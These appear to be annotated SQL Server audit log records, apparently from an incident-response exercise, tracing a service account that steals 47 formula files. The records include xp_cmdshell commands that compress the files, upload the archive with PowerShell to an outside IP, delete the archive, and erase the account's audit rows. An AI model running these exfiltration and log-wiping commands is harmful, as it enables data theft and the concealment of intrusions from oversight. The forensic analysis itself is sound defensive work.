{"EventTime":"2024-11-06T00:10:14Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"xp_cmdshell 'dir \"D:\\LicenseDeals\\USPartner2024\\\" /b /s'","RowsAffected":0,"AdditionalInfo":"Extended stored procedure called — directory enumeration of formula package","analyst_note":"⚠ svc_backup runs xp_cmdshell to enumerate USPartner2024 directory — 47 files listed"}
{"EventTime":"2024-11-06T00:10:18Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"FileServer_Audit","SchemaName":"dbo","ObjectName":"AuditLog","StatementType":"SELECT","Statement":"SELECT TOP 1 * FROM dbo.AuditLog WHERE ObjectPath LIKE '%USPartner2024%' ORDER BY EventTime DESC","RowsAffected":1,"AdditionalInfo":"Adversary queries audit log — may be checking for prior access records","analyst_note":"Adversary queried existing audit log — reconnaissance on prior access to formula directory"}
{"EventTime":"2024-11-06T00:10:44Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"EXEC xp_cmdshell 'powershell.exe -Command \"Compress-Archive -Path D:\\LicenseDeals\\USPartner2024\\* -DestinationPath C:\\Windows\\Temp\\update_pkg.zip -CompressionLevel Optimal\"'","RowsAffected":0,"AdditionalInfo":"Compression of 47 formula files into update_pkg.zip via xp_cmdshell → PowerShell","analyst_note":"⚠ CRITICAL: All 47 formula files compressed into single archive C:\\Windows\\Temp\\update_pkg.zip — pre-exfiltration staging"}
{"EventTime":"2024-11-06T00:13:54Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"EXEC xp_cmdshell 'powershell.exe -Command \"$c=New-Object System.Net.WebClient;$c.UploadFile(\\\"https://198.51.100.44/recv\\\",\\\"POST\\\",\\\"C:\\Windows\\Temp\\update_pkg.zip\\\")\"'","RowsAffected":0,"AdditionalInfo":"WebClient UploadFile to 198.51.100.44 — exfiltration of compressed formula package","analyst_note":"⚠ CRITICAL: Formula archive uploaded to 198.51.100.44 via PowerShell WebClient — 381 MB. Matches Palo Alto NGFW flow at 00:14:14Z"}
{"EventTime":"2024-11-06T00:14:58Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"EXEC xp_cmdshell 'del /F /Q \"C:\\Windows\\Temp\\update_pkg.zip\"'","RowsAffected":0,"AdditionalInfo":"Staged archive deleted from temp directory after upload","analyst_note":"Anti-forensic cleanup — archive deleted after exfiltration. File no longer recoverable without disk image (legal hold prevents this on WS-IT-LEVI)."}
{"EventTime":"2024-11-06T00:15:22Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"FileServer_Audit","SchemaName":"dbo","ObjectName":"AuditLog","StatementType":"DELETE","Statement":"DELETE FROM dbo.AuditLog WHERE EventTime >= '2024-11-06T00:00:00' AND LoginName = 'LIFETECHPHARMA\\svc_backup'","RowsAffected":8,"AdditionalInfo":"Adversary deletes own audit trail from database audit log — 8 rows removed","analyst_note":"⚠ Anti-forensics: SQL audit log partially cleared for svc_backup session on Nov 6. 8 rows deleted. These entries were recovered from the Splunk-forwarded copy (Splunk ingested the rows before the DELETE ran). This file represents the Splunk copy — NOT the server-side database."}